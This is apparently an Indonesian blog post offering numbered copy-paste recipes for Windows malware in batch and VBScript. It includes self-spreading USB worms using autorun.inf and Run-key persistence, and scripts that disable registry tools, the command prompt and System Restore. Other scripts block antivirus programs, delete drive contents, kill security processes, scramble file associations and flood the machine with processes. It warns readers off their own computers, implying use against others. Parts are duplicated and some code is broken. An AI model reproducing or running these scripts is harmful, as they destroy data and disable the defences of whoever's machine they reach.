" TOLONG JANGAN LAKUKAN INI DI KOMPUTER/LAPTOP ANDA SENDIRI KARENA ITU MENGAKIBATAKAN FATAL "
Ok Langsung aja ke KTP >>>
[-] Buka Notepad >
[-] Copy Tulisan Merah Dibawah ini:
1. @echo off
copy bosgentongsvirus.bmp %systemdrive%\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\system32\ /y
copy bosgentongsvirus.exe %systemdrive%\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “KOMPUTER DALAM KEADAAN SANGAT BURUK AKIBAT VIRUS” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “SISTEM MEMORY TELAH RUSAK MATIKAN KOMPUTER” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v bosgentongsvirus /d %systemdrive%\windows\system32\bosgentongsvirus.exe /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_CURRENT_USER\Control Panel\Colors” /v window /d #C10000 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\bosgentongsvirus.bmp /f
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ——————————————————-
echo ============= BOSGENTONGS love HACKER ==============
echo ============= bosgentongs inc. Team ==============
echo ============= Kediri, 16 Juli 2009 ==============
echo ——————————————————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
echo Deleting All Data
ping localhost -n 2 >nul
cls
echo Deleting All Data.
ping localhost -n 2 >nul
cls
echo Deleting All Data..
ping localhost -n 2 >nul
cls
echo Deleting All Data…
cls
Echo Deleting All Data….
ping localhost -n 2 >nul
cls
Echo Deleting All Data…..
ping localhost -n 2 >nul
cls
Echo Deleting All Data……..
ping localhost -n 2 >nul
cls
Echo All data have been Deleted
ping localhost -n 2 >nul
cls
Echo System Error
Echo System can’t open windows Folder
Echo Warning! Sistem shutting down
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 5400 -c “VIRUS INI TELAH MERUSAK SISTEM MEMORY DAN OPERASI MATIKAN KOMPUTER!!“
:bgvirus
echo>>Albert.reg
echo>>Anak.chm
echo>>Ideal.dll
echo>>Sekali.htt
cls
goto bgvirus
[-] Klik Save > Kasih Nama : DownPc.bat
Udah jadi dahh xD
BACA >
2.
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <>
"A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpat
h&
"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window
Title","zer03s was HERE"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
Copy paste script di bawah ini, pastenya di notepad dan simpan dengan type .vbs (misalnya : Secret.vbs)
3.
echo off
for %%p in (C D E F G H I J K L M N) do copy %0 %%p:
for %%d in (*.jpg) do attrib +h +s %%d:\*.jpg /s
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /d 1 /t REG_DWORD /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v aktifkan /t REG_SZ /d C:\u-hurt-me.bat /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 4 /f
REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout /v ScancodeMap /t REG_BINARY /d 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00 /f
Setelah anda selesai mengetik/copy script di atas, lalu simpan dengan nama terserah anda dan jangan lupa memberikan akhiran .bat.
Sedikit penjelasan mengenai virus ini..Menggandakan dirinya ke dalam beberapa drive. Menyembunyikan file-file image yang berekstensi jpg. Fasilitas Run, Command Prompt, Folder Options, Search, dan Start Menu Programs dihilangkan. Menutup akses ke regedit, command prompt, drive C sebagai system.
Men-disable tombol windows pada keyboard.
Apabila ingin lebih mengerikan lagi tambahkan script berikut ini untuk menutup System Restore.
REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
Simpan kode diatas dengan format .bat
4. On error resume next Dim dini,jatiya,i,loph,you,mf, isi,tf,vhck3d,nt,check,sd 'Siapkan isi autorun atau bahasa kerennya make the autorun Isi = "[autorun]" & vbcrlf & "shellexecute=wscript. exe vhck3d.vbs" Set you = createobject ("scripting.filesystemo bject") Set mf = you.getfile (wscript.scriptfullname) Dim text,size Size = mf.size Check = mf.drive.drivetype Set text = mf.openastextstream (1,-2) Do while not text.atendofstream Dini = dini & text.readline Dini = dini & vbcrlf Loop Do 'Buat file induk bahasa coolnya prepare the mother Set i = you.getspecialfolder(0) Set jatiya = you.getspecialfolder(1) Set tf = you.getfile(jatiya & "\hck3d.vbs") Tf.attributes = 32 Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true) Tf.write dini Tf.close Set tf = you.getfile(jatiya & "\hck3d.vbs") Tf.attributes = 39 'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya For each loph in you.drives If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then Set tf=you.getfile (loph.path &"\vhck3d.sys.vbs") Tf.attributes =32 Set tf=you.createtextfile (loph.path &"\vhck3d.vbs",2,true) Tf.write dini Tf.close Set tf=you.getfile(loph.path &"\vhck3d.vbs") Tf.attributes = 39 Set tf =you.getfile(loph.path &"\autorun.inf") Tf.attributes = 32 Set
tf=you.createtextfile (loph.path &"\autorun.inf",2,true) Tf.write isi Tf.close Set tf = you.getfile(loph.path &"\autorun.inf") Tf.attributes=39 End if Next 'Manipulasi registry Set vhck3d = createobject ("wscript.shell") 'Banyak yang dirubah..liat ndiri deh aaah Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \msconfig.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \regedit.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \regedt32.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \registryeditor.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \setup.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \avscan.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \avcenter.exe
\debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \ashavast.exe
\debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \ansav.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \viremoval.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \viremover.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows nt \currentversion\image file execution options \pcmav-cln.exe.exe \debugger","" Vhck3d.regwrite "hkey_local_machine
\software\microsoft \windows \currentversion \winlogon \legalnoticecaption", "my loph dini" Vhck3d.regwrite "hkey_local_machine \software\policies \microsoft\windows \installer \limitsystemrestoreche ckpointing", "1", "reg_ dword" Vhck3d.regwrite "hkey_local_machine \software\policies \microsoft\windows \installer\disablemsi", "1", "reg_dword" Vhck3d.regwrite "hkey_local_machine \software\policies \microsoft\windows nt \systemrestore \disablesr", "1", "reg_ dword" Vhck3d.regwrite "hkey_local_machine \software\policies \microsoft\windows nt \systemrestore \disableconfig", "1", "reg_dword" If check <> 1 then Wscript.sleep 200000 End if Loop while check <> 1 Set sd = createobject ("wscript.shell") Sd.run i & "\explorer.exe /e,/ select, " & wscript.scriptfullname
Simpan kode diatas dengan format .vbs
5. Buka Notepad ketik script
dibawah ini dan Save As
menggunakan
Extension .VBS
Set wshShell =
wscript.CreateObject
("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys
"You are a gay"
loop
6. buka notepad anda.
copy paste tulisan dibaah ini:
@echo off
DEL C: -Y
DEL D: -Y
ubah “type as file” ke “all files” dan save notepad dengan nama virus mematikan.bat
7. Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens
Hanya Copy kode di bawah ini lalu paste Pada Notepad:
title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
Simpan di C: dengan nama installhack.bat
8. Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.
Let`s Begin!
langkah-langkah:
1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
9.
Efek dari virus ini adalah membuat file berformat .dll, .exe, .vbs, .reg, .txt, .mp3, .xml, .png menjadi tipe gambar dan tex.
Jika computer kalian terkena virus ini, komputer perlu di install ulang.
Caranya adalah sebagai berikut:
Klik kiri start, dan pilih RUN
Pada menu RUN, ketikkan “notepad” ( tanpa tanda petik) dan tekan tombol Enter
Copy and Paste script di bawah ini yang berwarna merah
@echo off
rem ———————————
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ———————————
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ———————————
Kemusian Save As dengan nama virus.bat atau terserah keinginan agan-agan yang penting extensinya .bat
Jika kalian ingin virus ini berjalan otomatis buatlah Autorun, caranya Copy and Paste Script bercetak tebal pada notepad di bawah ini:
@echo off
source=C:\*.*”
set destination=”C:\%USERPROFILE%\Start Menu\Programs\Startup”
copy “%source%\YourVirusName.bat” %destination%
pause
exit
Kemudian Save As dengan nama Autorun.inf
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:
option explicit
dim wshshell
set wshshell=wscript.createobject("wscript.shell")
dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next
9.
Efek dari virus ini adalah membuat file berformat .dll, .exe, .vbs, .reg, .txt, .mp3, .xml, .png menjadi tipe gambar dan tex.
Jika computer kalian terkena virus ini, komputer perlu di install ulang.
Caranya adalah sebagai berikut:
Klik kiri start, dan pilih RUN
Pada menu RUN, ketikkan “notepad” ( tanpa tanda petik) dan tekan tombol Enter
Copy and Paste script di bawah ini yang berwarna merah
@echo off
rem ———————————
rem Confuse File Extensions Powerup
assoc .dll=txtfile
assoc .exe=pngfile
assoc .vbs=Visual Style
assoc .reg=xmlfile
assoc .txt=regfile
rem ———————————
rem Confuse File Extensions for text
assoc .mp3=txtfile
assoc .xml=txtfile
assoc .png=txtfile
rem ———————————
Kemusian Save As dengan nama virus.bat atau terserah keinginan agan-agan yang penting extensinya .bat
Jika kalian ingin virus ini berjalan otomatis buatlah Autorun, caranya Copy and Paste Script bercetak tebal pada notepad di bawah ini:
@echo off
source=C:\*.*”
set destination=”C:\%USERPROFILE%\Start Menu\Programs\Startup”
copy “%source%\YourVirusName.bat” %destination%
pause
exit
Kemudian Save As dengan nama Autorun.inf
bagi yg mau download membuat virus sendiri download di sini sudah ada langkah"nya
http://www.4shared.com/…/UF2-7Jyz/membuat_virus_sendiri.html
" TOLONG JANGAN LAKUKAN INI DI KOMPUTER/LAPTOP ANDA SENDIRI KARENA ITU MENGAKIBATAKAN FATAL
Tidak ada komentar:
Posting Komentar